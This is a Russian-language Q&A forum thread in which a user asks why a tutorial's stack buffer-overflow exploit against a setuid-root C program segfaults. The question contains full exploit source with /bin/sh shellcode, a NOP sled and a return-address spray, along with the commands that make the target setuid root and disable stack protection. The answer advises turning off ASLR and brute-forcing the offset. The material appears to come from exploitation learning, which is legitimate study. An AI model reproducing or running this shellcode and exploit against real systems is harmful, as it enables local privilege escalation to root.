Эксплойт с буфером не работает на gcc

Question

Эксплойт с буфером не работает на gcc

Я пытался запустить этот эксплойт с переполнением буфера в уязвимом коде vuln.c на gcc (я нашел это в каком-то учебнике, а код не мой). Шелкод порождает оболочку.

exploit.c code

#include <stdlib.h>

char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

unsigned long sp(void)         // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer

int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;

offset = 0;            // Use an offset of 0
esp = sp();            // Put the current stack pointer into esp
ret = esp - offset;    // We want to overwrite the ret address

printf("Stack pointer (ESP) : 0x%x\n", esp);
printf("    Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);

// Allocate 600 bytes for buffer (on the heap)
buffer = malloc(600);

// Fill the entire buffer with the desired ret address
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }

// Fill the first 200 bytes of the buffer with NOP instructions
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }

// Put the shellcode after the NOP sled
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }

// End the string
buffer[600-1] = 0;

// Now call the program ./vuln with our crafted buffer as its argument
execl("./vuln", "vuln", buffer, 0);

// Free the buffer memory
free(buffer);

return 0;
}

Этот эксплойт для уязвимого кода vuln.c:

int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}

Но когда я запускаю его, используя./exploit, он дает ошибку сегментации вместо открытия оболочки. Я использовал команды:

sudo chown root vuln
sudo chmod +s vuln
ls -l vuln
gcc -fno-stack-protector -o vuln vuln.c
./vuln
gcc -o exploit exploit.c
./exploit

Это показывает результат:

(gdb) run
Starting program: /home/a/exploit 
Stack pointer (ESP) : 0xbffff338
Offset from ESP : 0x0
Desired Return Addr : 0xbffff338
process 4669 is executing new program: /home/a/vuln

Program received signal SIGSEGV, Segmentation fault.
0xbffff338 in ?? ()
(gdb) info registers
eax            0x0  0
ecx            0xbfe3f5a0   -1075579488
edx            0xbfe3dca8   -1075585880
ebx            0xb76e4ff4   -1217507340
esp            0xbfe3dc60   0xbfe3dc60
ebp            0xbffff338   0xbffff338
esi            0x0  0
edi            0x0  0
eip            0xbffff338   0xbffff338
eflags         0x10246  [ PF ZF IF RF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
(gdb)

Пожалуйста, скажите мне, в чем проблема...

1

gdb buffer-overflow exploit

Источник

user2538255 08 июл '13 в 15:27

1 ответ

Другие вопросы по тегам gdb buffer-overflow exploit

user15531711 01 апр '21 в 14:28 2021-04-01 14:28 · Answer 1 · 2021-04-01 14:28

Ваша проблема заключается в адресе, на который вы переходите....

Этот эксплойт НЕ использует утечки памяти, поэтому его предполагается запускать в системе, которая не поддерживает ASLR.

Как только ASLR отключен в вашей системе, вы должны запустить эксплойт N раз, пока не перейдете на правильный адрес шеллкода...

Функция sp() возвращает значение esp для этого процесса, но оно может меняться в зависимости от обратной трассировки и процесса... поэтому вам придется увеличивать значение, пока не будет достигнут правильный адрес...

Вывод:

отключить ASLR
добавить смещение, повторяющееся каждый раз, и добавить его к значению esp перед использованием

Удачи!!!!